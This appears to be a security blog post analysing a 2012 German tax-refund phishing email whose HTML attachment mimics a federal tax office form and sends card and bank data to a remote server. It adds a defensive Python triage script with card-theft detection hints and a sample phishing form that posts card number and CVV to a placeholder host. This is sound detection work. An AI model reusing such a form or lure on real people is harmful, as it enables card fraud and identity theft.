Tax evasion? Don’t need that! Spam email promises tax refund!


Germans are well known for accurate bureaucracy, and taxpayers have to file their income tax statement by the end of May. It is not surprising that attackers jump on that opportunity now, as they do with several other special occasions during the year, such as the EURO 2012, or with recurring holiday-related spam.

Taxpayers are currently waiting for their tax office’s feedback, and the fake email sent to users’ inboxes poses as legitimate feedback with a promised tax refund of almost €235. We’ve seen other mails with different refund values, but the scheme remains the same.

Screenshot of fake DCTO email to phish user data

The outward appearance of this email is rather convincing, but the text is peppered with mistakes and is most probably the result of an automatic translation.
The most interesting part is the attached HTML file, with a design that is pretty similar to the design used on the “Bundeszentralamt für Steuern” (German Federal Central Tax Office) website:

Screenshot of the fake tax refund form

All information added in this form will be sent to a remote server:

The server used in this email, located in Belgium, still exists, but currently does not respond to any of our requests. During our analysis, we did not encounter any malware.
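
One way a mail gateway or analyst could triage an attachment like the one described above: parse the HTML, find each form's action, and flag forms that send bank or card fields to a remote host. This is an added example, not code from the original analysis; the hint list, the sample markup and the host `collector.example.invalid` are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field-name fragments suggesting bank or card data is requested (assumed list).
SENSITIVE_HINTS = ("card", "cvv", "iban", "account", "pin", "expiry", "blz")


class FormAudit(HTMLParser):
    """Collect each <form>'s action URL and the names of its input fields."""
    def __init__(self):
        super().__init__()
        self.forms = []       # list of {"action": str, "fields": [str]}
        self._current = None  # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            self._current["fields"].append((a.get("name") or a.get("id") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_attachment(html_text):
    """Return findings for forms that post sensitive fields to a remote host."""
    parser = FormAudit()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        url = urlparse(form["action"])
        sensitive = sorted({f for f in form["fields"]
                            if any(h in f for h in SENSITIVE_HINTS)})
        # A local HTML file that submits to an absolute http(s) URL leaves the machine.
        if url.scheme in ("http", "https") and url.hostname and sensitive:
            findings.append({"host": url.hostname, "tls": url.scheme == "https",
                             "sensitive_fields": sensitive})
    return findings


# Constructed sample attachment; host and field names are placeholders.
SAMPLE = """<html><body><form method="post" action="http://collector.example.invalid/save.php">
<input name="fullname"><input name="card_number"><input name="cvv">
<input name="expiry_date"><input type="submit" value="Senden"></form></body></html>"""

if __name__ == "__main__":
    print(audit_attachment(SAMPLE))
```

The substring hints are a heuristic and will produce false positives on unrelated field names, so a hit is a reason to quarantine and review the attachment rather than a verdict.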

What can happen if someone enters all the requested data?

  • The attackers can use the bank data / credit card data for carding fraud or simply do some online shopping on the victim’s account.
  • They can use the data, which they know is valid, and sell it on the underground market.

What should you do and know?

  • Ignore those emails and throw them into the digital waste bin.
  • Feedback regarding taxes is issued by the local tax offices and not by the FCTO.
  • Remember: Official state authorities, such as the CTO, would never contact you with a simple email when requesting such important information.
  • Therefore, never disclose any personal information and/or bank data - either via email or on dubious websites.
  • Use an up-to-date, comprehensive security solution with a virus scanner, firewall, HTTP scan and real-time protection. A spam filter, to get rid of unwanted spam in the first place, is a must-have, too.